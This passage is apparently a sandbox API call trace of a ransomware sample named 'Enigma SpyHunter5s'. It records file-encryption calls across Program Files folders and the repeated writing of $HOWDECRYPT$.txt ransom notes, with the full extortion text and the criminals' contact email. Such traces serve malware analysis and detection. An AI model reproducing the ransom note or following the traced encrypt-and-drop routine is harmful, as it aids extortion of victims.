hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e798*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e798*=0x30) returned 1 [0162.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Workflow.Activities.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.workflow.activities.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.382] GetProcessHeap () returned 0x2c0000 [0162.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.382] GetProcessHeap () returned 0x2c0000 [0162.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9078 | out: hHeap=0x2c0000) returned 1 [0162.382] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e7a0 | out: pbBuffer=0x248e7a0) returned 1 [0162.382] GetProcessHeap () returned 0x2c0000 [0162.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e798*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e798*=0x30) returned 1 [0162.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Speech.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.speech.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.383] GetProcessHeap () returned 0x2c0000 [0162.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.383] GetProcessHeap () returned 0x2c0000 [0162.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eadfb8 | out: hHeap=0x2c0000) returned 1 [0162.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e798 | out: pbBuffer=0x248e798) returned 1 [0162.383] GetProcessHeap () returned 0x2c0000 [0162.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.383] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e790*=0x30) returned 1 [0162.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.ServiceModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.servicemodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.383] GetProcessHeap () returned 0x2c0000 [0162.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.383] GetProcessHeap () returned 0x2c0000 [0162.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8f60 | out: hHeap=0x2c0000) returned 1 [0162.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e798 | out: pbBuffer=0x248e798) returned 1 [0162.384] GetProcessHeap () returned 0x2c0000 [0162.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.384] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e790*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e790*=0x30) returned 1 [0162.384] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Runtime.Serialization.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.runtime.serialization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.384] GetProcessHeap () returned 0x2c0000 [0162.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.384] GetProcessHeap () returned 0x2c0000 [0162.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ead088 | out: hHeap=0x2c0000) returned 1 [0162.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e790 | out: pbBuffer=0x248e790) returned 1 [0162.384] GetProcessHeap () returned 0x2c0000 [0162.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.384] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e788*=0x30) returned 1 [0162.384] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.Printing.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.printing.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.384] GetProcessHeap () returned 0x2c0000 [0162.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.384] GetProcessHeap () returned 0x2c0000 [0162.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa608 | out: hHeap=0x2c0000) returned 1 [0162.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e790 | out: pbBuffer=0x248e790) returned 1 [0162.385] GetProcessHeap () returned 0x2c0000 [0162.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e788*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e788*=0x30) returned 1 [0162.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IO.Log.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.io.log.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.385] GetProcessHeap () returned 0x2c0000 [0162.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.385] GetProcessHeap () returned 0x2c0000 [0162.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eadeb8 | out: hHeap=0x2c0000) returned 1 [0162.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e788 | out: pbBuffer=0x248e788) returned 1 [0162.385] GetProcessHeap () returned 0x2c0000 [0162.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e780*=0x30) returned 1 [0162.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.Selectors.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.selectors.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.386] GetProcessHeap () returned 0x2c0000 [0162.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.386] GetProcessHeap () returned 0x2c0000 [0162.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eacf60 | out: hHeap=0x2c0000) returned 1 [0162.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e788 | out: pbBuffer=0x248e788) returned 1 [0162.386] GetProcessHeap () returned 0x2c0000 [0162.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0162.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248e780*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248e780*=0x30) returned 1 [0162.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\System.IdentityModel.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\system.identitymodel.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.386] GetProcessHeap () returned 0x2c0000 [0162.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0162.386] GetProcessHeap () returned 0x2c0000 [0162.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8e48 | out: hHeap=0x2c0000) returned 1 [0162.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.399] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.399] WriteFile (in: hFile=0xa0, lpBuffer=0x248e6b7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e7e0, lpOverlapped=0x0 | out: lpBuffer=0x248e6b7*, lpNumberOfBytesWritten=0x248e7e0*=0x127, lpOverlapped=0x0) returned 1 [0162.400] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.400] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e7e0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e7e0*=0x2ac, lpOverlapped=0x0) returned 1 [0162.400] CloseHandle (hObject=0xa0) returned 1 [0162.400] GetProcessHeap () returned 0x2c0000 [0162.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8d30 | out: hHeap=0x2c0000) returned 1 [0162.401] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.519] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.519] WriteFile (in: hFile=0xa0, lpBuffer=0x248e6b3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e7dc, lpOverlapped=0x0 | out: lpBuffer=0x248e6b3*, lpNumberOfBytesWritten=0x248e7dc*=0x127, lpOverlapped=0x0) returned 1 [0162.520] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.520] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e7dc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e7dc*=0x2ac, lpOverlapped=0x0) returned 1 [0162.521] CloseHandle (hObject=0xa0) returned 1 [0162.521] GetProcessHeap () returned 0x2c0000 [0162.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5ec0 | out: hHeap=0x2c0000) returned 1 [0162.521] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.522] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.522] WriteFile (in: hFile=0xa0, lpBuffer=0x248e6af*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e7d8, lpOverlapped=0x0 | out: lpBuffer=0x248e6af*, lpNumberOfBytesWritten=0x248e7d8*=0x127, lpOverlapped=0x0) returned 1 [0162.523] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.523] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e7d8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e7d8*=0x2ac, lpOverlapped=0x0) returned 1 [0162.523] CloseHandle (hObject=0xa0) returned 1 [0162.523] GetProcessHeap () returned 0x2c0000 [0162.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eadcb8 | out: hHeap=0x2c0000) returned 1 [0162.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0162.525] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.525] WriteFile (in: hFile=0xa0, lpBuffer=0x248e6ab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e7d4, lpOverlapped=0x0 | out: lpBuffer=0x248e6ab*, lpNumberOfBytesWritten=0x248e7d4*=0x127, lpOverlapped=0x0) returned 1 [0162.526] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.526] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e7d4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e7d4*=0x2ac, lpOverlapped=0x0) returned 1 [0162.526] CloseHandle (hObject=0xa0) returned 1 [0162.526] GetProcessHeap () returned 0x2c0000 [0162.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa2f0 | out: hHeap=0x2c0000) returned 1 [0162.526] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e770 | out: pbBuffer=0x248e770) returned 1 [0162.526] GetProcessHeap () returned 0x2c0000 [0162.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.526] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e768*=0x30) returned 1 [0162.526] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.527] GetProcessHeap () returned 0x2c0000 [0162.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.527] GetProcessHeap () returned 0x2c0000 [0162.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eacbe8 | out: hHeap=0x2c0000) returned 1 [0162.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e770 | out: pbBuffer=0x248e770) returned 1 [0162.527] GetProcessHeap () returned 0x2c0000 [0162.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0162.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248e768*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248e768*=0x30) returned 1 [0162.527] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0162.527] GetProcessHeap () returned 0x2c0000 [0162.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0162.527] GetProcessHeap () returned 0x2c0000 [0162.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa1e8 | out: hHeap=0x2c0000) returned 1 [0162.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.683] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0162.683] WriteFile (in: hFile=0x9c, lpBuffer=0x248e69f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e7c8, lpOverlapped=0x0 | out: lpBuffer=0x248e69f*, lpNumberOfBytesWritten=0x248e7c8*=0x127, lpOverlapped=0x0) returned 1 [0162.683] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0162.683] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e7c8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e7c8*=0x2ac, lpOverlapped=0x0) returned 1 [0162.684] CloseHandle (hObject=0x9c) returned 1 [0162.684] GetProcessHeap () returned 0x2c0000 [0162.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eaa0e0 | out: hHeap=0x2c0000) returned 1 [0162.684] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e768 | out: pbBuffer=0x248e768) returned 1 [0162.684] GetProcessHeap () returned 0x2c0000 [0162.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0162.684] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248e760*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248e760*=0x30) returned 1 [0162.684] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\update-settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0162.686] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\update-settings.ini") returned 62 [0162.686] StrStrW (lpFirst="update-settings.ini", lpSrch=".txt") returned 0x0 [0162.686] GetProcessHeap () returned 0x2c0000 [0162.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 